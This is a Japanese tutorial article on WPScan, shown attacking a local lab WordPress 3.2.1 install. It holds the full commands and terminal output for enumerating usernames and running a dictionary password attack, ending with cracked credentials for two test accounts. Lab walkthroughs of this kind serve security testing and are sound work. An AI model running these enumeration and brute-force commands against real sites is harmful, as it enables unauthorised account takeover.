Articles - Tools |
ユーザー名の調査とパスワードクラッキング
次にユーザー名の調査を--enumerateオプションで実行してみる
root@bt:/pentest/web/scanners/wpscan# ./wpscan.rb --url lamp/wordpress-3.2.1/ --enumerate u ____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.0 WordPress Security Scanner by ethicalhack3r.co.uk Sponsored by the RandomStorm Open Source Initiative _____________________________________________________ # Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. | URL: http://lamp/wordpress-3.2.1/ | Started on Sat Jul 23 02:03:39 2011 [+] The WordPress theme in use is called twentyeleven [+] The WordPress http://lamp/wordpress-3.2.1/readme.html file exists. [+] WordPress version 3.2.1 identified from meta generator. [+] Enumerating usernames... We found the following 2 username/s: admin TTS [+] Finished at Sat Jul 23 02:03:45 2011 root@bt:/pentest/web/scanners/wpscan#
ユーザー名として、adminとTTSの二人が列挙されているのがわかるだろう。
辞書を利用したパスワードアタックは--wordlistオプション、--threadsオプション、usernameオプションなどを組み合わせて行うことができる。
たとえば、adminというユーザー名を指定、辞書にdic.txtを指定して、アタックを行う場合には、
ruby ./wpscan.rb --url www.example.com –wordlist dic.txt --username admin
という指定をすればよいわけだ。今回は、デキレースではないが、10個の単語を辞書(test.txt)として、その中に該当するパスワードが存在するという状況でテストしている。テストは上記のadmin/TTSの二人のユーザーが存在するWordPress環境である。
root@bt:/pentest/web/scanners/wpscan# ./wpscan.rb --url lamp/wordpress-3.2.1/ --wordlist test.txt ____________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| v1.0 WordPress Security Scanner by ethicalhack3r.co.uk Sponsored by the RandomStorm Open Source Initiative _____________________________________________________ # Copyright (C) 2011 Ryan Dewhurst # This program comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it # under certain conditions. See GNU GPLv3. | URL: http://lamp/wordpress-3.2.1/ | Started on Sat Jul 23 02:04:31 2011 [+] The WordPress theme in use is called twentyeleven [+] The WordPress http://lamp/wordpress-3.2.1/readme.html file exists. [+] WordPress version 3.2.1 identified from meta generator. [+] Enumerating usernames... We found the following 2 username/s: admin TTS [+] Starting the password brute forcer Brute forcing admin with 10 passwods... Brute forcing TTS with 10 passwods... SUCCESS! Username:TTS Password:dead SUCCESS! Username:admin Password:admin [+] Finished at Sat Jul 23 02:04:51 2011 root@bt:/pentest/web/scanners/wpscan#
ユーザー名の列挙に続いて、二人のパスワードがクラックされているのがわかるだろう。パスワードクラックでは、前述したように、スレッドを指定することもできるので、たとえば、50スレッドを指定するのであれば、—threads 50を付加すればよいだけだ。
最後に
WordPressの人気を考えれば、サイト構築に利用しているユーザーは膨大な数であることは言うまでもなく、また、WordPressおよびプラグインの脆弱性、そして脆弱なパスワードによって、それらのサイトがクラックされているケースも膨大な数なのである。本サイトのニュースで紹介しているようなデーターベース漏洩事件でも、WordPressで構築されたサイトが度々登場している。
WPScanは、WordPressのバージョンなどの基本ともいえる事前調査~WordPressおよびプラグインの既知の脆弱性の有無の調査を簡単に行えるツールといえるだろう。